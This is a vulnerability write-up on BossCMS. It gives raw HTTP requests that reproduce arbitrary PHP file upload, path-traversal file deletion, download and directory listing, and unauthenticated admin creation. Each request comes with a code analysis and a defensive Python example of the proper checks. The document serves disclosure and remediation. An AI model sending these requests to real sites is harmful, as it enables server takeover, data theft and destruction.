1. Arbitrary file upload
Constraints
action=uploadfile; the file is sent in the multipart field upfile with filename 1.php
Reproduction
POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
Host: bosscms.com
Content-Length: 761
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAsLBZuxNv1g9kBB0
Accept: */*
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/attachment/attachment.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sle15srngo4hspjv2d7ifia6b5
Connection: close

------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="name"

1.php
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="type"

application
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jun 07 2023 17:22:54 GMT+0800 (中国标准时间)
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="size"

20
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryAsLBZuxNv1g9kBB0--
With the allowed-upload-types list configured, a .php file is refused when it is uploaded through the editor dialog.
Posting the file directly to the controller URL bypasses that list; the response returns the URL at which the uploaded file can be reached.
Code analysis
The upload logic only checks whether a file was uploaded and what size it is; it does nothing about the file extension or the file content.
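As an added example (not code from BossCMS or from this write-up), the presence-and-size check described above is placed beside a check that would have refused the captured request. The allowlist, size cap and file signatures are assumptions chosen for the example; the payload is the <?php phpinfo();?> from the request. The hardened check also renames the stored file, which is what makes a double extension such as x.php.jpg harmless.

```python
import secrets
from typing import Tuple

# Extension allowlist and size cap are assumptions for this example; the real
# values live in the CMS configuration, which the write-up does not show.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
MAX_SIZE = 2 * 1024 * 1024

# Leading bytes for the binary types above, so that "shell.jpg" containing
# PHP source is refused even though its extension is allowed.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


def vulnerable_check(filename: str, content: bytes, max_size: int = MAX_SIZE) -> bool:
    """The logic the write-up describes for action=uploadfile: a file is present and its size is in range."""
    return bool(filename) and 0 < len(content) <= max_size


def validate_upload(filename: str, content: bytes, max_size: int = MAX_SIZE) -> Tuple[bool, str]:
    """Return (True, extension) for an acceptable upload, otherwise (False, reason)."""
    if not content:
        return False, "empty file"
    if len(content) > max_size:
        return False, "file too large"
    # Reject control characters (null-byte truncation tricks) before looking at the name.
    if any(ord(c) < 0x20 for c in filename):
        return False, "invalid filename"
    # Keep only the last path component; the client-supplied directory part is never trusted.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return False, "missing extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    # For binary types the content must start with that type's signature.
    sigs = MAGIC.get(ext)
    if sigs and not content.startswith(sigs):
        return False, "content does not match declared type"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen file name: random basename plus the validated extension only.

    Renaming discards the attacker's name entirely, so neither x.php.jpg nor any
    other trick in the original filename can reach the upload directory.
    """
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    php = b"<?php phpinfo();?>"            # the payload from the captured request
    print(vulnerable_check("1.php", php))   # True: only presence and size are checked
    print(validate_upload("1.php", php))    # (False, 'extension not allowed')
    print(validate_upload("shell.jpg", php))
    print(validate_upload("../../a.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

Note that the extension check alone would still accept shell.jpg carrying PHP source; the signature check is what catches that case, and the random rename is what protects against servers that execute based on any extension in the name.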
2. Arbitrary file deletion
Constraints
POST request, path must start with upload
Reproduction
POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1
Host: bosscms.com
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

path=upload/1.txt
Code analysis
The same file contains a delete function. It checks that the path parameter of the POST request exists and that it starts with upload.
It then checks whether store_type in config is empty: if it is not, delete() of the oss class is called, otherwise delete() of the dir class. Searching for store_type shows it is the storage-mode setting and defaults to 0, so the dir class's delete() is the one taken.
replace only performs simple substitutions on path and does not touch the characters needed here, so ../ can be written into the path directly; the prefix check is satisfied by anything that begins with upload, such as upload/../<target>. The if then checks whether a file exists at that path and, if it does, deletes it.
3. Arbitrary file download
Constraints
mold=safe&part=backup&func=download&id=../../basic/1.txt
Reproduction
GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1
Host: bosscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=safe&part=backup&func=table
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
Code analysis
It checks whether the id parameter exists; if so, id is concatenated into the SQL and into a path that is assigned to $file. It then checks whether $file is a file and, if so, sends the download headers and calls readfile($file), reading the file directly. id is never normalised or checked against the backup directory, so ../ walks out of it.
4. Directory traversal (directory listing)
Constraints
action=listfile&folder=../
Reproduction
GET /system/extend/ueditor/php/controller.php?action=listfile&folder=../ HTTP/1.1
Host: bosscms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Referer: http://bosscms.com/admin/?mold=site&part=site&func=init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
Code analysis
config is consulted first for fileManagerActionName (list files), which dispatches to the listfile function; it then checks that the GET parameters start and size exist and are numeric.
It then calls lists, which takes the folder parameter and passes it through arrExist, a function that checks whether the key exists in the array and returns its value (or empty if it does not); the result is assigned to $folder. $path = dir::replace($path.'/'.$folder) concatenates $path, '/' and $folder and runs replace on it; everything below reads that path directly.
The directory is opened and read with opendir() and readdir(), so folder=../ lists the parent of the upload directory.
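Sections 2, 3 and 4 are the same defect three times: a user-controlled path segment is joined onto a directory and used as-is, with at most a prefix check (delete) in front of it. The example below is added here and is not code from BossCMS or from the write-up. It reproduces the prefix check and a common wrong fix (a single str.replace of ../), then shows the check that actually works: resolve the path and require the result to remain inside the directory the feature is allowed to touch. SITE_ROOT, the backup directory location and target names such as index.php are placeholders; the three payloads (path=upload/1.txt plus ../, id=../../basic/1.txt, folder=../) are the ones from the requests above.

```python
import os
from typing import Optional

# Hypothetical install layout for the example; the real directories are not in the write-up.
SITE_ROOT = "/var/www/bosscms"
# action -> (directory the feature may touch, directory the parameter is relative to),
# both relative to SITE_ROOT.
ACTIONS = {
    "delete":   ("upload", ""),        # controller.php action=delete: path=upload/1.txt is relative to the site root
    "listfile": ("upload", "upload"),  # controller.php action=listfile: folder=... is relative to the upload dir
    "download": ("backup", "backup"),  # admin backup download: id=... relative to an assumed backup dir
}


def vulnerable_prefix_check(path: str) -> bool:
    """The only check the write-up describes for action=delete: present and starts with 'upload'."""
    return bool(path) and path.startswith("upload")


def naive_strip(path: str) -> str:
    """A common wrong fix, one pass of str.replace('../', ''): '....//' survives it as '../'."""
    return path.replace("../", "")


def resolve_within(allowed_dir: str, user_path: str, join_root: Optional[str] = None) -> Optional[str]:
    """Join user_path under join_root (default allowed_dir), normalise it, and
    return the absolute path only if it is still inside allowed_dir."""
    if "\x00" in user_path:
        return None
    allowed = os.path.realpath(allowed_dir)
    root = os.path.realpath(join_root) if join_root else allowed
    # Backslashes are folded to '/' so '..\\' cannot slip past on a Windows host.
    # os.path.join discards root when user_path is absolute, so /etc/passwd
    # resolves to itself and fails the containment test below.
    candidate = os.path.realpath(os.path.join(root, user_path.replace("\\", "/")))
    try:
        inside = os.path.commonpath([allowed, candidate]) == allowed
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return candidate if inside else None


def resolve_for_action(action: str, user_path: str) -> Optional[str]:
    """Apply resolve_within with the directories configured for one of the three actions."""
    allowed_sub, rel_sub = ACTIONS[action]
    return resolve_within(
        os.path.join(SITE_ROOT, allowed_sub),
        user_path,
        join_root=os.path.join(SITE_ROOT, rel_sub),
    )


if __name__ == "__main__":
    print(vulnerable_prefix_check("upload/../index.php"))      # True: prefix check passes
    print(naive_strip("upload/....//index.php"))               # upload/../index.php
    print(resolve_for_action("delete", "upload/1.txt"))        # stays inside upload
    print(resolve_for_action("delete", "upload/../index.php")) # None
    print(resolve_for_action("download", "../../basic/1.txt")) # None
    print(resolve_for_action("listfile", "../"))               # None
```

commonpath compares whole path components, which is why uploads_old/1.txt is refused even though it starts with the string upload, and why upload/....//x is accepted: after normalisation it is an ordinary (non-existent) subdirectory named ...., not a traversal.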
5. Unauthenticated admin creation
Constraints
mold=manager&part=manager&func=add
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"

eeee
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"

2
Reproduction
POST /admin/?mold=manager&part=manager&func=add HTTP/1.1
Host: bosscms.com
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bosscms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrrq418NZS9wguXwR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=manager&part=manager&func=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"

test
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"

2
------WebKitFormBoundaryrrq418NZS9wguXwR--
Capture the add-admin request while logged in, log out, then resend it: the account is created (the response reports success) and the page redirects to the login page.
Code analysis
The request is handled via POST and $data is filled as an array. An if checks that the new password and the repeated password are both non-empty, then that they are equal; if they are, the md5 of the password is stored in $data['password'].
To reach alert(保存成功) ("saved successfully"), none of the if...else error branches may fire: id does not exist here, and in the else branch username must not already exist and level must not equal 1; the conditional then falls through and alert(保存成功) is emitted. From start to finish the handler never verifies the user's login state.
The code also does no XSS filtering on username, so there is an XSS issue as well.
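As an added example (not code from BossCMS or from this write-up), the add-manager flow described above is modelled twice: once as described (password and level checks, no login check, username rendered unescaped), and once behind a deny-by-default dispatcher that refuses every non-public route without an authenticated session, so the replayed request gets a redirect instead of a new account. The in-memory table, the level-1-only policy for creating admins, the username pattern, the public route set and PBKDF2 in place of md5 are assumptions of the example; the form fields are those of the captured request.

```python
import hashlib
import html
import os
import re
from typing import Callable, Dict, Tuple

Response = Tuple[int, str]                  # (HTTP status, body)
Table = Dict[str, Dict[str, object]]        # username -> {"password": ..., "level": ...}

# The form fields from the captured request (constructed sample input).
SAMPLE_FORM = {"username": "test", "password": "qwert", "passwords": "qwert", "level": "2"}

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")   # assumed username policy


def hash_password(password: str) -> str:
    """Salted PBKDF2 in place of the unsalted md5 the write-up reports."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def seed_table() -> Table:
    """One built-in super admin (level 1); constructed for the example."""
    return {"admin": {"password": hash_password("change-me"), "level": 1}}


def vulnerable_add(form: Dict[str, str], table: Table) -> Response:
    """The flow the write-up describes: password checks, uniqueness, level != 1, no login check, no escaping."""
    pw, pw2 = form.get("password", ""), form.get("passwords", "")
    if not pw or not pw2 or pw != pw2:
        return 200, "password mismatch"
    name = form.get("username", "")
    if name in table or form.get("level") == "1":
        return 200, "rejected"
    table[name] = {"password": hashlib.md5(pw.encode()).hexdigest(), "level": int(form["level"])}
    # The username is echoed back unescaped, which is the XSS the write-up notes.
    return 200, f"<script>alert('保存成功')</script>{name}"


def safe_add(session: Dict[str, str], form: Dict[str, str], table: Table) -> Response:
    """Add handler that runs only behind the authentication gate in dispatch()."""
    caller = table.get(session.get("admin", ""))
    if caller is None or caller["level"] != 1:
        return 403, "only a level-1 admin may create admins"   # assumed policy
    pw, pw2, name, level = (form.get(k, "") for k in ("password", "passwords", "username", "level"))
    if not pw or pw != pw2:
        return 400, "password mismatch"
    if not USERNAME_RE.match(name) or name in table:
        return 400, "invalid or duplicate username"
    if not level.isdigit() or int(level) < 2:
        return 400, "invalid level"
    table[name] = {"password": hash_password(pw), "level": int(level)}
    return 200, f"saved: {html.escape(name)}"   # escape on output even though the name is already restricted


# Route table, and the routes reachable without a session (login only; assumed).
ROUTES: Dict[Tuple[str, str, str], Callable[..., Response]] = {
    ("manager", "manager", "add"): safe_add,
}
PUBLIC = {("login", "login", "index")}


def dispatch(session, mold, part, func, form, table) -> Response:
    """Deny by default: every non-public route requires an authenticated admin in the session."""
    key = (mold, part, func)
    if key not in PUBLIC and not session.get("admin"):
        return 302, "/admin/?mold=login"
    handler = ROUTES.get(key)
    if handler is None:
        return 404, "not found"
    return handler(session, form, table)


if __name__ == "__main__":
    t = seed_table()
    print(vulnerable_add(SAMPLE_FORM, t), "test" in t)                       # created without any session
    t = seed_table()
    print(dispatch({}, "manager", "manager", "add", SAMPLE_FORM, t), "test" in t)   # 302, nothing created
```

The gate sits in dispatch rather than in each handler so that a newly added func cannot forget it; the level check inside safe_add is the second, per-route layer.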